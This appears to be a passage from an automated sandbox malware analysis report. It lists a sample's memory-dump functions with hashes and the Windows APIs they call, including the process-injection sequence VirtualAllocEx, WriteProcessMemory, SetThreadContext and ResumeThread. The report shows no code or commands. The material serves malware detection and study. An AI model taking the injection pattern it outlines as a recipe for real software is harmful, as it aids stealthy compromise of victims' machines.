Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a00fe87e8d37663464ca66fecc710b95c2d5b71105c86eac95b56ee4953b365c
Instruction ID: 38e9b1303bad5e66e1f6271cde8396c6c3471449f6ef3ac775818f2c23724fc9
Opcode Fuzzy Hash: a00fe87e8d37663464ca66fecc710b95c2d5b71105c86eac95b56ee4953b365c
Instruction Fuzzy Hash: B4214BB19003099FDB10CFAAC8857DEBBF4FF48324F10882AE558A7240D778A545CBA5

Function 0796909B Relevance: 1.6, APIs: 1, Instructions: 74
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 07969162

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 13aa6adb29430021816481be7acd827755af60a2a0022a69d7f81d2549c094b7
Instruction ID: daaa5bac57012df0829c02335f2791734db08da8855d44a6567a0c1ba804b618
Opcode Fuzzy Hash: 13aa6adb29430021816481be7acd827755af60a2a0022a69d7f81d2549c094b7
Instruction Fuzzy Hash: B9219AB1D043498FDB14DFA9C8043AEBBF4AF85314F20856ED419A7280DB389A45CB91

Function 07800400 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07800497

Memory Dump Source

Source File: 00000000.00000002.1460613640.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_SLq0ulC3Wf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: c8f93a6ff832d88dbed7440d1611323554f6cf2ec7e7ee93234d08e3ce972e90
Instruction ID: 504a394a60add6c6566c03e39205519b65edd937a5d5c8fde161b55e7e45fadc
Opcode Fuzzy Hash: c8f93a6ff832d88dbed7440d1611323554f6cf2ec7e7ee93234d08e3ce972e90
Instruction Fuzzy Hash: 2721E0B5D003099FDB10CF9AD884ADEFBF4FB48224F14842AE919A7250D774A944CFA4

Function 07969780 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07969810

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 80fbf33f41d76cb5dcda0184ba868e463bb16659f28dea00c68bc36493204488
Instruction ID: 6f5b2ec05d3ea64761c54c0405a3b34ce2fae27674aad07acbd92ee161035b54
Opcode Fuzzy Hash: 80fbf33f41d76cb5dcda0184ba868e463bb16659f28dea00c68bc36493204488
Instruction Fuzzy Hash: 6C213BB19003099FDB10CFAAC8857DEBBF5FF48314F10842AE518A7240C7789545DFA4

Function 079691A8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796922E

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c193f1aa26dc64a394c9c6edb82e9fb5a4fa2e39423915752a936ebc73244e62
Instruction ID: ab7576eb5f8e0eaa78c8fb4faf309126492e65d778e17bd87f801a17618c952e
Opcode Fuzzy Hash: c193f1aa26dc64a394c9c6edb82e9fb5a4fa2e39423915752a936ebc73244e62
Instruction Fuzzy Hash: A7216AB19003098FDB10CFAAC4857EEBBF5EF48324F14842EE459A7240CB78A545CFA5

Function 07969C68 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07969CF0

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9d4305ce9b6a3b1e426cb3cd7c3b555f5e19ae251e469bfa553669abe9822717
Instruction ID: 02f9e397350c6c0a2e0513970961525f9844732d6ca4086209b9ecf22465b01e
Opcode Fuzzy Hash: 9d4305ce9b6a3b1e426cb3cd7c3b555f5e19ae251e469bfa553669abe9822717
Instruction Fuzzy Hash: 352139B19003599FDB10CFAAC8857DEBBF4FF48310F10882AE558A7250C7799541CFA5

Function 016BCD80 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016BD686,?,?,?,?,?), ref: 016BD747

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 618621dcb143188c5b04e267ebf35ca6b61769e98a86cbbdacb2a2b93a6708bc
Instruction ID: 84ca9cda09d51cbc6a39c2ee1ba7090780a77024a0786541324ef8f4aef5ddf4
Opcode Fuzzy Hash: 618621dcb143188c5b04e267ebf35ca6b61769e98a86cbbdacb2a2b93a6708bc
Instruction Fuzzy Hash: C121E9B59003489FDB10CFAAD884AEEFBF4EB48314F14842AE914A7350D374A954CFA5

Function 016BD6B9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016BD686,?,?,?,?,?), ref: 016BD747

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ada2c68613f95552f8486f91515458313098c948d4f6879dab3c761f55369a75
Instruction ID: 0fdab73dc74d7637284f19bea5d006692f9cd86e8bd6aaec833a68080d6602e1
Opcode Fuzzy Hash: ada2c68613f95552f8486f91515458313098c948d4f6879dab3c761f55369a75
Instruction Fuzzy Hash: 2521E3B5D002499FDB10CFAAD884ADEBBF8EB48314F14841AE918A7350D374A944CFA5

Function 079691B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796922E

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 726b9213fd1cb6afb426be06d447a950bee58f14ad9be65092044268034d4dc7
Instruction ID: fc34673c27e36426815af546c254fa6d0787f4111b22925bc8fe483a06c7d4dc
Opcode Fuzzy Hash: 726b9213fd1cb6afb426be06d447a950bee58f14ad9be65092044268034d4dc7
Instruction Fuzzy Hash: EF2129B19003098FDB10DFAAC4857EEBBF5EF48324F14842ED459A7240CB78A945CFA5

Function 07969C70 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07969CF0

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 862fb98a1abd5c841f8d04cb9620aa4c4c55e3b518276c31e964b1c0c51cd889
Instruction ID: 598d0f7384cd5b92eb87fd9e58dde419e5cd35250d2cd5c07ba5e114f0eef509
Opcode Fuzzy Hash: 862fb98a1abd5c841f8d04cb9620aa4c4c55e3b518276c31e964b1c0c51cd889
Instruction Fuzzy Hash: 722128B18003599FDB10CFAAC884BDEBBF5FF48310F10882AE519A7250C7799541CFA4

Function 079696B8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0796972E

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 20e6bfd5e8000011e20573aa766e367284bd5ff9b567f386c88276980ce24501
Instruction ID: 9dccf409d83557717805516642b7928a50c8e71bc25c7758f0669a75d18f3ab2
Opcode Fuzzy Hash: 20e6bfd5e8000011e20573aa766e367284bd5ff9b567f386c88276980ce24501
Instruction Fuzzy Hash: 952167728003499FDB20CFAAC844BDFBBF5AF48320F10881AE465A7650C775A541CFA1

Function 079696C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0796972E

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fabd171e8b9d93bde495cbb59ca8b7a17a8a1ab60befe11073bfb1a59f6d53e9
Instruction ID: 1c75d218d6b1fda715f9357bc991799262f56e60d952d58c6372ee01b5781d8b
Opcode Fuzzy Hash: fabd171e8b9d93bde495cbb59ca8b7a17a8a1ab60befe11073bfb1a59f6d53e9
Instruction Fuzzy Hash: 551137729003499FDB10DFAAC844BDFBBF5EF48324F14881AE529A7250C775A541DFA0

Function 079690F8 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07969162

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f6fff68e5b3458333db943935e7631219f3819ec9d1faf2532ccc4f6216253a3
Instruction ID: 4236d6ff530408a6426238044c5192360bbd46688a76da43861d17bdf4d05b3d
Opcode Fuzzy Hash: f6fff68e5b3458333db943935e7631219f3819ec9d1faf2532ccc4f6216253a3
Instruction Fuzzy Hash: 14115BB19043498FDB20DFAAC8487DFFBF4EF88224F24891AD069A7250C7755505CF95

Function 016B9BF8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016BB20C), ref: 016BB446

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f7a8567c7876f2e39ed70ef5d517224bf480644ef6475646ede2cf4b982468bc
Instruction ID: d847dc3caaaa7d19033f1004afa99be0df0b1c0678e89bd84ad20b52bbc2c220
Opcode Fuzzy Hash: f7a8567c7876f2e39ed70ef5d517224bf480644ef6475646ede2cf4b982468bc
Instruction Fuzzy Hash: BD1104B5C007498FDB20CF9AC884BDEFBF4EF48214F10841AD519A7211D379A545CFA5

Function 07969100 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07969162

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dc9212cba67e7dd318ac704e5f6b6224571486f0db7e5af079a62fa1bb286061
Instruction ID: 35adf24236092783b8fe39f42298b6fc1922da23609493f93f93f64c1a14ff6d
Opcode Fuzzy Hash: dc9212cba67e7dd318ac704e5f6b6224571486f0db7e5af079a62fa1bb286061
Instruction Fuzzy Hash: 7B113AB1D003498FDB20DFAAC8497DFFBF8AF88624F24881AD419A7240CB756545CFA4

Function 0796C793 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0796C7F5

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6216037a3054efd17eb30b731725c1e527bd6cfecb74e6e4dfbbcbd724da7286
Instruction ID: e5b5df8355481a0371fa0cf751058c63c01fa73e225de936bedd1945a21657bb
Opcode Fuzzy Hash: 6216037a3054efd17eb30b731725c1e527bd6cfecb74e6e4dfbbcbd724da7286
Instruction Fuzzy Hash: 7A1133B58003499FDB20CF9AC889BDEBFF8EB48324F10881AE458A7740C375A544CFA1

Function 07969968 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0796C7F5

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ea2f8c17e8249d22284d9f1588724e41a831f1d265a5baab50946d64ebb78b49
Instruction ID: 220e6b6219728de641907f41ce9d5f4542aaf516fbf5fc09d52d86f8ca23d7c6
Opcode Fuzzy Hash: ea2f8c17e8249d22284d9f1588724e41a831f1d265a5baab50946d64ebb78b49
Instruction Fuzzy Hash: 0A1106B58003499FDB20CF9AC888BDEBBF8EB49314F10881AE558A7310C375A944CFA1

Function 0163D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434446085.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e0552710510d505fefdfba9b3760ca36deb4e2f833088405dc6a0f0cedf7ff
Instruction ID: c2c06e4293a80173e6b2df1ddf8aa680b9a22336bf2304164e43688c51254c36
Opcode Fuzzy Hash: 14e0552710510d505fefdfba9b3760ca36deb4e2f833088405dc6a0f0cedf7ff
Instruction Fuzzy Hash: 8121D3B2504240EFDB15DF54D9C0B26BFA5FBC8328F64C569E9090B297C336D456CAA2

Function 0163D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434446085.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cce7eb8703f0d632f528907374312fbd70474d8eb01c62fe873f561729276b0
Instruction ID: eb11cef464193cbc1c280bf483e5db29d6b0e5fe1df0bcd0f2dce16fcc50fcd2
Opcode Fuzzy Hash: 3cce7eb8703f0d632f528907374312fbd70474d8eb01c62fe873f561729276b0
Instruction Fuzzy Hash: A12103B1504204EFDB05DF94D9C0B6ABBA5FBC8324F60C169E90A0B257C336E456CBA2

Function 0164D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434514825.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_164d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd4ac0dd3383393f6c2a926588ef83700d7dadc0e9c338743daf8dfb7606648
Instruction ID: c2d9b8c4962b7969bd1cee2ce8dc876f87d8a2ddc3b168876453c55ac58ff11a
Opcode Fuzzy Hash: cfd4ac0dd3383393f6c2a926588ef83700d7dadc0e9c338743daf8dfb7606648
Instruction Fuzzy Hash: C9210471A04300EFDB05DF94D9C0B26BBA5FB94328F20C66DEA494B352C336D446CA61

Function 0164D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434514825.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_164d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3bba9709311e2e4232707f3c85ab6eaa2ccb5981eee0440d123493d3adbb4f
Instruction ID: 726c7d2e3d147707f2d8615e40ece3c01e6136f78b890e5a48c7ed593f1a4614
Opcode Fuzzy Hash: 7f3bba9709311e2e4232707f3c85ab6eaa2ccb5981eee0440d123493d3adbb4f
Instruction Fuzzy Hash: D1210471A04340EFDB15DFA4D9C4B26BBA5FB94B14F20C56DE84A4B386C33AD447CA62

Function 0163D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434446085.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 4c167b85ac1e69513c29414c6bca3ecf8061823220baa5d535dc721cf53ee0ef
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 1511B176504280DFCB16CF54D9C4B16BF71FB84328F24C6A9D8490B657C336D45ACBA1

Function 0163D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434446085.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 4887b2211213a3b47ad644ee0855f4b276e6148ae9cf4ec9a80ad2b2845f49f3
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 2B11DCB2404280DFCB02CF54D9C4B56BF72FB84324F24C2A9D8090B657C33AE45ACBA2

Function 0164D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434514825.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_164d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: fac888e4296c4c66e2f03e4fad43a025a17a9f2873f168514c4baf99528be7dc
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: 1F11BE75904280CFCB16CF54D9C4B15BBA2FB44714F24C6A9D8094B756C33AD44ACB61

Function 0164D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434514825.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_164d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: f04ddd3987335b7fb132661a1ca03106db7ac08653864b6269710c12b1bac348
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: 4111BB75904280DFCB02CF54C9C4B16BBA1FB84228F24C6A9E9494B796C33AD44ACB61

Function 0163D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434446085.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10e9a85406f6e5586ffe56dd61bf1b19a477375566ff79ce8d5cb5e232f7e1b
Instruction ID: 6eabdf6dd306219da746508787ab53d56c6084a518a347b1f870ccb38bf653f9
Opcode Fuzzy Hash: e10e9a85406f6e5586ffe56dd61bf1b19a477375566ff79ce8d5cb5e232f7e1b
Instruction Fuzzy Hash: 6401F771008380ABE7224EA5CC84B77BBE8EFC1664F54C55AED180A382C3399401CA71

Function 0163D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434446085.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_163d000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1545f61a51506452e2efde72f0534bcc909f9b50328a0320ed83fc05d81c604
Instruction ID: 31a56c1abc82cbeca831f01b9aa7baf5b8f1bc8a8917f58bb634bcbe482af516
Opcode Fuzzy Hash: c1545f61a51506452e2efde72f0534bcc909f9b50328a0320ed83fc05d81c604
Instruction Fuzzy Hash: ECF062714083849FE7118E5ACC84B67FFE8EB81634F18C45AED084B397C3799844CAB1

Non-executed Functions

Function 0796DB10 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9ec226bb27fe404d61967ee2e79a549c0d61515f1a71a74bd656128c9e86a6
Instruction ID: 932170a4cc9b2c8caf8d4a0f4b45b27154a9912e9634dd6187c8ce3dfed1d1f5
Opcode Fuzzy Hash: 1f9ec226bb27fe404d61967ee2e79a549c0d61515f1a71a74bd656128c9e86a6
Instruction Fuzzy Hash: 9DE1FFB17013058FDB19DB76C858BAEB7FAAFCA208F1445ADD166CB290CB38D941CB51

Function 079688C8 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412600c44bd702d705161ed0b7cd77994e8c540680fe510627a98355720c5cac
Instruction ID: 72f4d374b7f0a094b1487e6d3597ba8b948fcdff0847458d15d5931ec6e5bd35
Opcode Fuzzy Hash: 412600c44bd702d705161ed0b7cd77994e8c540680fe510627a98355720c5cac
Instruction Fuzzy Hash: 85E13CB4E0021ACFDB14DFA9C584AAEBBB6FF89304F248169D405AB355C7309D41CFA4

Function 07967088 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bc2ceec7cc52a36cb91b2340f50459187cfaa6596df6f70eb9c6881d445130
Instruction ID: 6fb2ca9fc3d789addba7ba9a7ed291ca39685a0e15590d685bf9cd3c728ebc5f
Opcode Fuzzy Hash: d8bc2ceec7cc52a36cb91b2340f50459187cfaa6596df6f70eb9c6881d445130
Instruction Fuzzy Hash: EBE11AB4E0021ACFDB14DFA9C5849AEBBB2FF89309F248269D414AB355D7309D41CFA0

Function 07969278 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d0e71ae154e85aea84eefe93e0eb722d974b83aa6c6f536d6bc145f99a63d5
Instruction ID: ff939612cdfb154bb51e671c9f4c1b36a396f77e8a0fc3417b57b3b3a4741508
Opcode Fuzzy Hash: 95d0e71ae154e85aea84eefe93e0eb722d974b83aa6c6f536d6bc145f99a63d5
Instruction Fuzzy Hash: 83E11AB4E0021ACFDB14DFA9C584AAEBBB2FF89315F248169D405AB355D731AD41CFA0

Function 079674D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd6fab6ef0856813d5f6aae7e5b8897df261afa9037a096d28cfc98039cdf22
Instruction ID: 4cc250deea0608dc5e5458898d715604f0d03b302f5dbf1d8f440b0224398575
Opcode Fuzzy Hash: bdd6fab6ef0856813d5f6aae7e5b8897df261afa9037a096d28cfc98039cdf22
Instruction Fuzzy Hash: 95E10AB4E0021ACFDB14DFA9C5849AEBBB2FF89308F248269D415AB355D734AD41CF61

Function 07966C60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0df4a726663494a5a9748cce930989d371e868a1b73f2eb13674542fe865ed5f
Instruction ID: a1621b1c56546e46d0a478847d2fd92d214fa2b1da2d9ab2198d806ba185d0c4
Opcode Fuzzy Hash: 0df4a726663494a5a9748cce930989d371e868a1b73f2eb13674542fe865ed5f
Instruction Fuzzy Hash: 17E1F8B4E0021ACFDB14DF99C5849AEBBB2FF89304F248269D415AB355D731AD42CFA0

Function 016BDFC4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c38e4b7921eb84c961f9c5029cd697c41b2c88599fac6252fc6cab71087296
Instruction ID: dfc3f2a78cc0bd983a4c50df0d9792eaf205e7bd7d95eb412d6d942c0f0aaea9
Opcode Fuzzy Hash: c3c38e4b7921eb84c961f9c5029cd697c41b2c88599fac6252fc6cab71087296
Instruction Fuzzy Hash: 7FA15E32A10219CFCF05DFB4DC805EEBBB2FF84300B1585AAE905AB261DB36D995CB40

Function 079688D8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
